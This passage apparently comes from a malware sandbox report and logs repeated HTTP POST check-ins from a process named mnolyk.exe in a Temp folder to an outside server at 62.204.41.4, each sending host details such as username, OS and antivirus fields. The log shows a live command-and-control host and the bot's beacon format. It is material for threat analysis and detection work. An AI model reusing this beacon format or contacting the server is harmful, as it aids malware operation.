Feb 7, 2023 20:02:33.959949970 CET	502	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
355	192.168.2.6	50079	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:34.128936052 CET	503	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:34.192717075 CET	503	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
356	192.168.2.6	50080	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:34.379327059 CET	504	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:34.441154957 CET	504	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
357	192.168.2.6	50081	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:34.618170977 CET	505	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:34.682039976 CET	505	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
358	192.168.2.6	50082	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:34.890335083 CET	506	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:34.954993963 CET	506	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
359	192.168.2.6	50083	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:35.239474058 CET	507	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:35.304311991 CET	507	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.6	49754	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:59.616651058 CET	141	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:59.680761099 CET	141	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
360	192.168.2.6	50084	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:35.626446009 CET	508	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:35.689728022 CET	508	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
361	192.168.2.6	50085	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:35.926261902 CET	509	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:35.989306927 CET	509	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
362	192.168.2.6	50086	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:36.208343983 CET	510	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:36.272155046 CET	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
363	192.168.2.6	50087	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:36.507623911 CET	511	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:36.572530031 CET	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
364	192.168.2.6	50088	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:36.767848969 CET	512	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:36.832468033 CET	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
365	192.168.2.6	50089	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:37.027587891 CET	513	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:37.093354940 CET	513	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
366	192.168.2.6	50090	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:37.310664892 CET	514	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:37.373964071 CET	514	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
367	192.168.2.6	50091	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:37.622394085 CET	515	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:37.687155008 CET	515	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
368	192.168.2.6	50092	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:37.868052006 CET	516	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:37.930119991 CET	516	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
369	192.168.2.6	50093	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:38.122438908 CET	517	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:38.187990904 CET	517	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.6	49755	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:59.855021000 CET	142	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:59.919234037 CET	143	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
370	192.168.2.6	50094	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:38.377723932 CET	518	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:38.441557884 CET	518	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
371	192.168.2.6	50095	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:38.620537043 CET	519	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:38.684617043 CET	519	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
372	192.168.2.6	50096	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:38.862015009 CET	520	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:38.926625967 CET	520	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
373	192.168.2.6	50097	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:39.099670887 CET	521	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:39.165566921 CET	521	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
374	192.168.2.6	50098	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
